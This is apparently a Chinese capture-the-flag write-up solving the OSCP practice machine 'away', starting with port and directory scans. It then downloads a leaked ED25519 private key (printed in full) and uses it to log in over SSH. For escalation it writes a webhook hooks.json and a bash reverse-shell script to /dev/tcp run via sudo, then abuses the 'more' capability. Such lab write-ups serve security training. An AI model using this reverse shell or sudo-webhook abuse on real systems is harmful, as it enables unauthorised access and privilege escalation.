OSCP 靶场
靶场介绍
|
away |
medium |
ED255915私钥利用、sudo-webhook 提权&反弹shell 、more 利用/提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
└─$ nmap -sV -A -p- -Pn -T4 192.168.1.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 08:54 +06
Nmap scan report for 192.168.1.41
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 f1:87:03:41:21:12:ef:80:3c:8f:07:2f:8b:3c:6e:2a (RSA)
| 256 5f:f9:ca:19:0d:74:65:2c:97:4a:36:a4:04:7c:9b:bd (ECDSA)
|_ 256 39:a4:b3:38:94:c5:d2:77:07:a1:dd:b4:2f:0a:5a:44 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).目录扫描
──(kali㉿kali)-[~]
└─$ gobuster dir -w pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.41 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.41
[+] Method: GET
[+] Threads: 10
[+] Wordlist: pte_tools/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.41/index.html (Status: 200) [Size: 247]
Progress: 5095332 / 5095336 (100.00%)
===============================================================
Finished
===============================================================
权限获取
信息收集没有其他收获,只能从唯一的页面入手了。
https://tailscale.com/learn/generate-ssh-keys
https://wentao.org/post/2021-04-25-upgrad-ssh-key/
简单来说ED25519就是替代rsa算法安全性更高的算法,用于防御hash 碰撞。
我们使用kali 生成一个看看
会生成对应的公钥和私钥
那么目标会不会泄露这个两个文件呢,思路对了,还真是这样。还直接给了密码。
下载私钥成功登录获取权限。
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.1.41/id_ed25519 -o id_ed
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 484 100 484 0 0 150k 0 --:--:-- --:--:-- --:--:-- 157k
┌──(kali㉿kali)-[~]
└─$ cat id_ed
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA+GY+qad
MDkU/yMHam3bmdAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTs
YR6Gg1apA+kuSgdtTkrrhhgskSJfAAAAsAEbt6fRUQfkYGDCdAa/zOBpiUuAV1kGiDs3F1
gD8y+UxeRdz6gQxbHAY53rE25YN+t1bml5GuNMx99CLApAQCMgeePifFV+t2gRnaMEGRnf
4u1RfM20X6rRYdKeQKHwrE5b/m4xgKC5FvKfiGESqirQ2XPWZnOfbcNc+czsut8t8v+zfl
kYo1mO1M4Va9i+OipgnoOJkdNB+mdx2f7YE0lWoHdt/7KVG5eDB90WrJZF
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_ed
┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -i id_ed
Enter passphrase for key 'id_ed':
Linux away 5.10.0-15-amd64 #1 SMP Debian 5.10.120-1 (2022-06-09) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 17 10:28:31 2022 from 192.168.1.51
tula@away:~$ 权限提升
这里存在lula 用户,我们可以尝试使用sudo 进行权限提升
关于webhook:https://www.redhat.com/en/topics/automation/what-is-a-webhook
webhook 是一个轻量级传入 webhook 服务器,用于运行 shell 命令
项目地址:https://github.com/adnanh/webhook我们可以参数项目使用方法,尝试反弹shell
写入一个hook 脚本,然后执行反弹shell脚本
tula@away:/tmp$ cat hooks.json
[
{
"id": "shell",
"execute-command": "/tmp/shell.sh",
"command-working-directory": "/tmp"
}
]
tula@away:/tmp$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.1.76/8889 0>&1开启webhook,默认会使用9000端口
sudo -u lula /usr/bin/webhook -hooks hooks.json -verbose最后,访问web 地址,传入id 成功反弹shell
查看到more 有查看的权限
/usr/sbin/getcap -r / 2>/dev/null
嘿,直接爆破shadow? 那是不可能的。当然要先直接读取ssh 私钥。
拿到root flag,完美收官。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】away
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论